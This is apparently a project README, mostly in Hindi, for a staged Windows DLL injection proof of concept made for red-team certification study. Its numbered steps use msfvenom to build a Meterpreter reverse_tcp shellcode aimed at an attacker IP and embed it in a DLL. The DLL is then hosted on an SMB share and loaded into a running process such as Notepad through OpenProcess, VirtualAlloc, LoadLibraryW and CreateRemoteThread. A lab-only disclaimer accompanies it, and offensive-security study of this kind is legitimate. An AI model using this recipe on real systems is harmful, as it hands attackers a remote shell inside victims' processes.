
स्टेज्ड DLL इंजेक्शन प्रूफ-ऑफ-कॉन्सेप्ट, C और Win32 APIs का उपयोग करके बनाया गया — एक पृथक प्रयोगशाला वातावरण में रेड टीम प्रमाणन अध्ययन (CRTO) के लिए विकसित।
C और Win32 API का उपयोग करके बनाया गया एक स्टेज्ड डीएलएल इंजेक्शन प्रूफ-ऑफ-कॉन्सेप्ट — जिसे रेड टीम प्रमाणन अध्ययन (CRTO) के लिए एक पृथक प्रयोगशाला वातावरण में विकसित किया गया है।
⚠️ अस्वीकरण: यह प्रोजेक्ट पूरी तरह से एक पृथक प्रयोगशाला वातावरण में शैक्षिक उद्देश्यों के लिए, आक्रामक सुरक्षा अनुसंधान और प्रमाणन अध्ययन (CRTO) के भाग के रूप में विकसित किया गया था। इसका उपयोग स्पष्ट लिखित प्राधिकरण के बिना किसी भी सिस्टम के विरुद्ध करने का इरादा नहीं है। अनधिकृत उपयोग अवैध और अनैतिक है।
विंडोज़ पर स्टेज्ड डीएलएल इंजेक्शन का एक प्रूफ-ऑफ-कॉन्सेप्ट कार्यान्वयन, जो रेड टीम प्रमाणन अध्ययनों के भाग के रूप में बनाया गया है। यह प्रोजेक्ट दर्शाता है कि कैसे एक स्टेजर नेटिव Win32 API का उपयोग करके लक्ष्य प्रक्रिया में एक दुर्भावनापूर्ण डीएलएल को दूरस्थ रूप से लोड कर सकता है। यह एक AD वातावरण में सबसे अच्छा काम करता है जो आंतरिक नेटवर्क के भीतर SMB ट्रैफ़िक की अनुमति देता है, इंटरनेट पर काम करने के लिए अनुशंसित नहीं है।
1. Build a shellcode with msfvenom
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<IP> LPORT=<port> -f raw -o /directory/payload.bin
2. Obtain the raw shellcode and convert into a C array
xxd -i payload.bin > payload.h
3. Copy the shellcode, and paste it under unsigned char payload_bin[] {xxxxx} array in maindll.c
4. Modify the phc.c to point the address to your IP in dllPath[]
5. Compile phc.c into .exe, and compile maindll.c into .dll file
6. Host the smb server, and paste the maindll.dll
7. Set up Listener
8. Open Notepad.exe and find the PID
9. Run phc.exe <PID>
phc.c)OpenProcess के माध्यम से लक्ष्य प्रक्रिया का एक हैंडल खोलता हैVirtualAlloc के माध्यम से लक्ष्य प्रक्रिया के अंदर मेमोरी आवंटित करता हैKernel32 से LoadLibraryW का पता प्राप्त करता हैCreateRemoteThread के माध्यम से एक रिमोट थ्रेड बनाता है जो LoadLibraryW को कॉल करता है, दूरस्थ SMB शेयर से DLL लोड करता हैmaindll.dll)DllMain स्वचालित रूप से DLL_PROCESS_ATTACH पर फायर करता हैVirtualAlloc के माध्यम से निष्पादन योग्य मेमोरी आवंटित करता हैCreateThread के माध्यम से इसे निष्पादित करता हैphc.exe → लक्ष्य प्रक्रिया खोलता है → लक्ष्य प्रक्रिया में मेमोरी आवंटित करता है → LoadLibraryW के माध्यम से SMB शेयर से maindll.dll लोड करता है → DllMain फायर करता है → लक्ष्य प्रक्रिया के अंदर शेलकोड निष्पादित होता है
CreateRemoteThread + LoadLibraryW के माध्यम से रिमोट DLL इंजेक्शनDllMain के माध्यम से DLL प्रवेश बिंदु दुरुपयोगWindows 10 पर एक पृथक प्रयोगशाला वातावरण में परीक्षण किया गया। C2 लिसनर Kali Linux पर होस्ट किया गया।